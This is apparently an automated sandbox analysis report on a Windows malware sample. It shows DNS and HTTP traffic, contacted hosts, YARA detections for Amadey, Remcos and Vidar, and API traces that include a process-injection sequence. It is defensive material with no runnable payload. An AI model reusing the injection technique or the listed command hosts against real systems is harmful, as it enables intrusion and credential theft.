Sep 28, 2023 06:04:58.803096056 CEST	8.8.8.8	192.168.2.3	0x87e4	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:00.304912090 CEST	8.8.8.8	192.168.2.3	0xfde1	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:01.806849003 CEST	8.8.8.8	192.168.2.3	0x4c43	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:03.364871979 CEST	8.8.8.8	192.168.2.3	0x4ca1	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:04.990542889 CEST	8.8.8.8	192.168.2.3	0xcb73	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:06.551423073 CEST	8.8.8.8	192.168.2.3	0x67e3	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:08.055949926 CEST	8.8.8.8	192.168.2.3	0xa668	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:09.599150896 CEST	8.8.8.8	192.168.2.3	0xe66b	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:11.099834919 CEST	8.8.8.8	192.168.2.3	0x6827	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:12.601188898 CEST	8.8.8.8	192.168.2.3	0x9d40	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:14.161282063 CEST	8.8.8.8	192.168.2.3	0xdf91	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:15.661519051 CEST	8.8.8.8	192.168.2.3	0x4928	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:17.301650047 CEST	8.8.8.8	192.168.2.3	0x537d	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:18.871089935 CEST	8.8.8.8	192.168.2.3	0xbf6a	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:20.493690968 CEST	8.8.8.8	192.168.2.3	0x8d47	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:22.053153038 CEST	8.8.8.8	192.168.2.3	0xcb1e	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:23.799484968 CEST	8.8.8.8	192.168.2.3	0x1a92	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:25.307146072 CEST	8.8.8.8	192.168.2.3	0x8dc2	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:26.873087883 CEST	8.8.8.8	192.168.2.3	0xd8cf	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:28.365129948 CEST	8.8.8.8	192.168.2.3	0xea	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:29.989506006 CEST	8.8.8.8	192.168.2.3	0xe658	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:31.491724014 CEST	8.8.8.8	192.168.2.3	0x929	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:33.054698944 CEST	8.8.8.8	192.168.2.3	0x7a83	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:34.752890110 CEST	8.8.8.8	192.168.2.3	0x45e	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:36.372513056 CEST	8.8.8.8	192.168.2.3	0x3593	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:37.993813992 CEST	8.8.8.8	192.168.2.3	0x7315	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:39.552588940 CEST	8.8.8.8	192.168.2.3	0x1b5d	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:41.101784945 CEST	8.8.8.8	192.168.2.3	0xcfb1	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:42.601962090 CEST	8.8.8.8	192.168.2.3	0xbca7	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:44.168281078 CEST	8.8.8.8	192.168.2.3	0xade8	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:45.807625055 CEST	8.8.8.8	192.168.2.3	0x49e	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:47.364371061 CEST	8.8.8.8	192.168.2.3	0xd16d	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:48.992279053 CEST	8.8.8.8	192.168.2.3	0xacc6	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:50.584646940 CEST	8.8.8.8	192.168.2.3	0x8dfd	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:52.304850101 CEST	8.8.8.8	192.168.2.3	0x16fd	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:53.867084026 CEST	8.8.8.8	192.168.2.3	0xf4dd	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:05:55.486463070 CEST	8.8.8.8	192.168.2.3	0xf582	No error (0)	mardukoff.info	127.0.0.127	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

95.141.41.12

transdi.org

pixcode.com.mx

geoplugin.net

116.202.2.169:1333

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49808	149.154.167.99	443	C:\Users\user\Desktop\yaALNupJCH.exe

Timestamp	Direction	Data
2023-09-28 04:01:57 UTC	OUT	GET /solonichat HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0 Host: t.me
2023-09-28 04:01:58 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 28 Sep 2023 04:01:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12384 Connection: close Set-Cookie: stel_ssid=7ea636a9d50f78b63a_16011379437204589503; expires=Fri, 29 Sep 2023 04:01:58 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2023-09-28 04:01:58 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 73 6f 6c 6f 6e 69 63 68 61 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @solonichat</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa

Target ID:	0
Start time:	06:01:50
Start date:	28/09/2023
Path:	C:\Users\user\Desktop\yaALNupJCH.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\yaALNupJCH.exe
Imagebase:	0xcb0000
File size:	224'256 bytes
MD5 hash:	B2EE13E6988E57F6731C20DA3459C8DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000000.875302819.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000000.00000000.875302819.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.1025890323.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1399625088.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	06:01:52
Start date:	28/09/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, STDAPI Start(void)
Imagebase:	0xa40000
File size:	61'952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:01:54
Start date:	28/09/2023
Path:	C:\Users\user\Desktop\yaALNupJCH.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\yaALNupJCH.exe
Imagebase:	0xcb0000
File size:	224'256 bytes
MD5 hash:	B2EE13E6988E57F6731C20DA3459C8DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000000.882851946.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000002.00000000.882851946.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	06:01:55
Start date:	28/09/2023
Path:	C:\Users\user\Desktop\yaALNupJCH.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\yaALNupJCH.exe
Imagebase:	0xcb0000
File size:	224'256 bytes
MD5 hash:	B2EE13E6988E57F6731C20DA3459C8DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.907305691.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000003.00000002.907305691.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000000.886541366.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000003.00000000.886541366.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:02:02
Start date:	28/09/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7592 -s 2020
Imagebase:	0x1070000
File size:	434'592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.9%
Total number of Nodes:	1131
Total number of Limit Nodes:	35

Executed Functions

Function 00CBE2B0 Relevance: 41.4, APIs: 9, Strings: 14, Instructions: 1171networksleepfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB2B70: RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
Part of subcall function 00CB2B70: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
Part of subcall function 00CB2B70: RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2

InternetOpenA.WININET(00CDFE4B,00000000,00000000,00000000,00000000), ref: 00CBE574
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00CBE591
InternetReadFile.WININET(00000000,?,03E80000,03E80000), ref: 00CBE5A5
InternetCloseHandle.WININET(00000000), ref: 00CBE5B0
InternetCloseHandle.WININET(00000000), ref: 00CBE5B5
InternetCloseHandle.WININET(00000000), ref: 00CBE5C4
InternetCloseHandle.WININET(00000000), ref: 00CBE5C9
Sleep.KERNEL32(00001388,?,?,?,?), ref: 00CBE60A
std::_Xinvalid_argument.LIBCPMT ref: 00CBF2F6

Part of subcall function 00CC16C0: Concurrency::cancel_current_task.LIBCPMT ref: 00CC17E1

Part of subcall function 00CC1350: Concurrency::cancel_current_task.LIBCPMT ref: 00CC1404

Strings

ON8o, xrefs: 00CBECE6
0xH3aDfoQl==, xrefs: 00CBE2F8, 00CBE489
xm==, xrefs: 00CBE8C5
zoiu, xrefs: 00CBEA81
853321935212, xrefs: 00CBE648
5120, xrefs: 00CBECCF, 00CBEEB5
Otu=, xrefs: 00CBE635
NSRn, xrefs: 00CBEF7E
Ownv, xrefs: 00CBEECC
2xCA, xrefs: 00CBEFD7
invalid stoi argument, xrefs: 00CBF2F1
0xH3aHDZQn4=, xrefs: 00CBE357
OJq=, xrefs: 00CBE624
stoi argument out of range, xrefs: 00CBF300

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Internet$Close$Handle$Open$Concurrency::cancel_current_task$FileQueryReadSleepValueXinvalid_argumentstd::_
String ID: 0xH3aDfoQl==$0xH3aHDZQn4=$2xCA$5120$853321935212$NSRn$OJq=$ON8o$Otu=$Ownv$invalid stoi argument$stoi argument out of range$xm==$zoiu
API String ID: 4067979168-1731373691
Opcode ID: 965b0d90643948c2a57ed07ec66eef97f49c26d92ab76d4c207b8599d92ade42
Instruction ID: 287be446ed5b85b91e8b0c3686f35d249731fc9dc9ef7d61760c28bedeb3b0ec
Opcode Fuzzy Hash: 965b0d90643948c2a57ed07ec66eef97f49c26d92ab76d4c207b8599d92ade42
Instruction Fuzzy Hash: C9921471A00104ABDF08EF78CC86BED7B76AF42744F54425CF815972D2DB35DA868B92

Uniqueness

Uniqueness Score: -1.00%

Function 00CBF340 Relevance: 40.5, APIs: 4, Strings: 18, Instructions: 2047COMMON

Download Yara Rule

Strings

ydDnNQ==, xrefs: 00CBFFD8
EwG+, xrefs: 00CBF7EA, 00CBF917
937693, xrefs: 00CBFFCE
xm==, xrefs: 00CBFA39
0MGb, xrefs: 00CC0037
ycHwNQ==, xrefs: 00CBFEFC
853321935212, xrefs: 00CBFE3E, 00CC002D
ydrmNQ==, xrefs: 00CBFF46
ydPCNQ==, xrefs: 00CC0014
BoU7MQ==, xrefs: 00CBFFF6
yczsNQ==, xrefs: 00CBFF90
ycZqNQ==, xrefs: 00CBFE89
ycn5NQ==, xrefs: 00CBFEB2
ycvBNQ==, xrefs: 00CBFF6B
ycv5NQ==, xrefs: 00CBFED7
EwC+, xrefs: 00CBF7AD, 00CBF813
ydLxNQ==, xrefs: 00CBFF21
ycZCNQ==, xrefs: 00CBFFB5

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: 0MGb$853321935212$937693$BoU7MQ==$EwC+$EwG+$xm==$ycHwNQ==$ycZCNQ==$ycZqNQ==$ycn5NQ==$ycv5NQ==$ycvBNQ==$yczsNQ==$ydDnNQ==$ydLxNQ==$ydPCNQ==$ydrmNQ==
API String ID: 0-597702700
Opcode ID: 34e92c7631094996d4f5637ff46b1b41d3d01b82463503efc2f3914402158bc2
Instruction ID: 84a275388964de665875ba2180271b76a794305fdcf7555f7ce04ff49d2eccf3
Opcode Fuzzy Hash: 34e92c7631094996d4f5637ff46b1b41d3d01b82463503efc2f3914402158bc2
Instruction Fuzzy Hash: 93F22771A001149BEB18DB38CC89BDDBB76AF82304F64829CE449973D6DB35DEC68B51

Uniqueness

Uniqueness Score: -1.00%

Function 00CB5E90 Relevance: 32.1, APIs: 12, Strings: 6, Instructions: 566
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CB4DD0: GetTempPathA.KERNEL32(00000104,?), ref: 00CB4DE8

GetFileAttributesA.KERNELBASE(00000000), ref: 00CB5EDE

Strings

FNPsamv=, xrefs: 00CB5FC6
FSZw 2Io, xrefs: 00CB6B06
IcZBbG0n, xrefs: 00CB68C6
FLPK, xrefs: 00CB6566
GLDITA==, xrefs: 00CB6206
JSZz9G0s, xrefs: 00CB69E6

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AttributesFilePathTemp
String ID: FLPK$FNPsamv=$FSZw 2Io$GLDITA==$IcZBbG0n$JSZz9G0s
API String ID: 3199926297-2233727051
Opcode ID: 45b79dd096bd906d303f78b99bffc56182f3ecdf64958b66c8bd02f2213eff74
Instruction ID: ba34e8472329765d1b28a35bec274292d668560ff15abac7425ba1cb9bcedd4b
Opcode Fuzzy Hash: 45b79dd096bd906d303f78b99bffc56182f3ecdf64958b66c8bd02f2213eff74
Instruction Fuzzy Hash: 7712FD70E001089BFF18EBB4D98ABEEBB729F51304F644518D812273D3D7799A85DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CB34C0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 144
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 00CB34DC
CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,00000000), ref: 00CB3535
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004,?,?,00000000), ref: 00CB354E
GetThreadContext.KERNELBASE(?,00000000,?,?,00000000), ref: 00CB3563
ReadProcessMemory.KERNELBASE(?, ,?,00000004,00000000,?,?,00000000), ref: 00CB3581
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,00000000), ref: 00CB3599
GetProcAddress.KERNEL32(00000000), ref: 00CB35A0
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,?,?,00000000), ref: 00CB35BF
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,?,00000000), ref: 00CB35DA
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00CB360C
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,?,00000000,?,?,00000000), ref: 00CB363C
SetThreadContext.KERNELBASE(?,00000000,?,?,00000000,?,?,00000000), ref: 00CB3652
ResumeThread.KERNELBASE(?,?,?,00000000,?,?,00000000), ref: 00CB365B
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000), ref: 00CB3669

Strings

, xrefs: 00CB3579
ntdll.dll, xrefs: 00CB3594
NtUnmapViewOfSection, xrefs: 00CB358F

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Process$Memory$ThreadVirtualWrite$AllocContextModule$AddressCreateFileFreeHandleNameProcReadResume
String ID: $NtUnmapViewOfSection$ntdll.dll
API String ID: 4232606500-1522589568
Opcode ID: 7f48af93f937722a396c37bd44b4161abe34d2f4b8235abd4b0f73aaf5fcfd30
Instruction ID: 4aa36f2e826f87d522b0994316bb796f8dd00e030d03c4893d2fd3f3a67da2e9
Opcode Fuzzy Hash: 7f48af93f937722a396c37bd44b4161abe34d2f4b8235abd4b0f73aaf5fcfd30
Instruction Fuzzy Hash: 2F513771A40209BFEB109FA4DC85FEEBBB8BF08700F504026F615EA290D7B5AA55CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00CB4210 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 401
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,?,777D6490), ref: 00CB4267
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00CB42C2
GetProcAddress.KERNEL32(00000000), ref: 00CB42C9
GetNativeSystemInfo.KERNELBASE(?), ref: 00CB4365

Strings

